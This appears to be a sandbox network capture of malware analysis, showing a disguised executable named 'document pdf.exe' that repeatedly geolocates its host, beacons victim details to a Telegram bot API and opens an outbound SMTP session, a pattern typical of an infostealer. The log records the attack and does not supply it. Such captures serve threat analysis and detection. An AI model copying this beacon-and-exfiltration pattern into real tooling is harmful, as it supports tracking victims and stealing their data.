2025-01-06 15:01:12 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-06 15:01:12 UTC | 859 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:12 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1490461
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPE8BW5%2BmKxV3SrDuc2o8b9POtPqk%2BR%2BGHBBlcH61PU5p27LYuL9KInCgdoeAUXdJeUetxEMomHY1AWFNd01cO7Nr%2BZGKXSJcw4Lpz6GZIDsnlcGQbCZLEUAC9JkOev%2BeBNNm84o"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fdc94fead3578e8-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1463659&cwnd=230&unsent_bytes=0&cid=61dfd25217c39ac7&ts=286&x=0"
2025-01-06 15:01:12 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49750 | 188.114.96.3 | 443 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 15:01:12 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-01-06 15:01:13 UTC | 859 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:13 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1490462
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBuFk%2F3rh0Jx3uOdrvHPZfZwIh%2FNY0wxN4mwkrm%2Fvzul73j85r88dNVck7xC4UgiY%2FhIgUfPMfi1umtRKqXpq%2FNcDlC4Tl4G87cFXO5RhRsnbT1aNVFhYLfiRscqa8kvmyyGoxN7"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fdc95047d0d5e66-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1631&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1790312&cwnd=182&unsent_bytes=0&cid=c6126632d08eadc0&ts=142&x=0"
2025-01-06 15:01:13 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49769 | 188.114.96.3 | 443 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 15:01:14 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-01-06 15:01:14 UTC | 857 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:14 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1490463
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAhUOoxf8pBrD%2FbV2NN8ESKy4Z2n0XYD7o68h73hV4bzjxcFFunEgN1rxYV5yu%2Fdp692c893WRR3SMxJXEXkI75oSUf%2Fb9N6IxO1FdF8oZrxuIOYr8l8YsJv%2Fzb0hj4Gf7wGAHOe"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fdc950f68517290-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=249&unsent_bytes=0&cid=9b3dd9032c7ddf74&ts=151&x=0"
2025-01-06 15:01:14 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49778 | 188.114.96.3 | 443 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 15:01:16 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-01-06 15:01:16 UTC | 857 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:16 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1490465
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EzjPZkbysF%2BdX9q0K8zrdpn683QvrulpuC4FsaLgqfyHie1meKadryZQclaJAqjIWLA5ALAA7%2FNuoTczuJVE18EgNpkDBKYROO2c%2Bx1J8c8bRPVPzu9rAs3xCxz3WKljJKC8BC%2Fb"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fdc95181886726b-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1933&rtt_var=734&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1481481&cwnd=238&unsent_bytes=0&cid=10d7c5e71e7a7f4e&ts=145&x=0"
2025-01-06 15:01:16 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
4           192.168.2.6  49790        188.114.96.3     443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:17 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-06 15:01:17 UTC  861                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 15:01:17 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1490466
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMT%2BU4ZkJTEwRgDIqR%2Ft0kZ9WDZbwExn3ynLwzxiA%2BWHfW%2BW1P5MC%2F4xbkGkulm5rbZ72q2mXbJth89RqfhIWO5NpzxLbq%2FUdyk2TUcb3G6v2NJx89oFkIdnSNWArB7QmKWhTs7u"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdc95217a2d43ab-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1592&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1571582&cwnd=221&unsent_bytes=0&cid=be4a7bdd8f8d322b&ts=168&x=0"
2025-01-06 15:01:17 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
5           192.168.2.6  49801        188.114.96.3     443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:19 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-06 15:01:19 UTC  865                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 15:01:19 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1490468
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bS2yjE98RQhrmDpFCO%2FuKU%2FGFXNDPV7D6Zn%2FOtZByNP36cE6m8Ds0b5Z5MGX%2F2TJp3owfPhPG7RokscEEsP4tG9Ix%2Fk4cYV9JAjgh%2F8K1D4w7gP4%2B%2BSRaUlTOoItke55ccv7NsXS"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdc952a89ea8c39-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=1973&rtt_var=845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1219715&cwnd=190&unsent_bytes=0&cid=cffae4b09711728b&ts=181&x=0"
2025-01-06 15:01:19 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.6  49813        188.114.96.3     443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:20 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-06 15:01:20 UTC  855                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 15:01:20 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1490469
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOUiiJEJvxnb67FHIiAFJ6ntQQnpXNgC896nXpRV1k6RWJe4qcRIFFKCGUEaDQpHyuy9cUmxmgoBxJaIYFlkzw2TO5hsYY%2FJ1J3ay0vqPFWvZJtjLFAT%2FctEn8uA3uYNr9ApctDg"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdc95339d3c7281-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1977&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=214&unsent_bytes=0&cid=b77278dcdab921bb&ts=167&x=0"
2025-01-06 15:01:20 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.6  49825        188.114.96.3     443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:22 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-06 15:01:22 UTC  857                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 15:01:22 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1490471
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlLx%2B3R4JENDsBiazSXTHiAtQPLqgBngRYHez6CNHNHOWWApzxODHsPWiX3xG629JTVfTqw1FTMtF84TyOb39sHOegdTMFPfrKkMCIgYyVoyx4BlfpHpFE9v%2Fxwjjq%2BUkn%2FC1I8R"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdc953d3b9b7cf9-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2016&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1397797&cwnd=211&unsent_bytes=0&cid=cc475e5480399746&ts=170&x=0"
2025-01-06 15:01:22 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.6  49841        188.114.96.3     443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:24 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-06 15:01:24 UTC  859                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 15:01:24 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 1490473
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCkliXeu8K%2BRDxd63KICewGd4WYAu1sEFMfywBzPMZ0LBqPEQ4Ns9tli6k8kyEGLLp%2FHNgiKpwyZ0xANIzYJy4kmHB7rZUWNXnrQdryoQaRctOrHG%2BUC6o3LXtx0w0w6p1S%2BZ5jB"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8fdc954d4a9a78d6-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=1986&rtt_var=784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1470292&cwnd=147&unsent_bytes=0&cid=2ccf5eeecabe51d3&ts=144&x=0"
2025-01-06 15:01:24 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                       Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
9           192.168.2.6  49847        149.154.167.220  443               2672  C:\Users\user\Desktop\document pdf.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 15:01:25 UTC  349                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                       Host: api.telegram.org
                                                       Connection: Keep-Alive
2025-01-06 15:01:25 UTC  344                IN         HTTP/1.1 404 Not Found
                                                       Server: nginx/1.18.0
                                                       Date: Mon, 06 Jan 2025 15:01:25 GMT
                                                       Content-Type: application/json
                                                       Content-Length: 55
                                                       Connection: close
                                                       Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 15:01:25 UTC  55                 IN         Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                       Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp                           Source Port  Dest Port  Source IP       Dest IP         Commands
Jan 6, 2025 16:01:32.010430098 CET  587          49890      208.91.199.225  192.168.2.6     220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 6, 2025 16:01:32.010634899 CET  49890        587        192.168.2.6     208.91.199.225  EHLO 680718
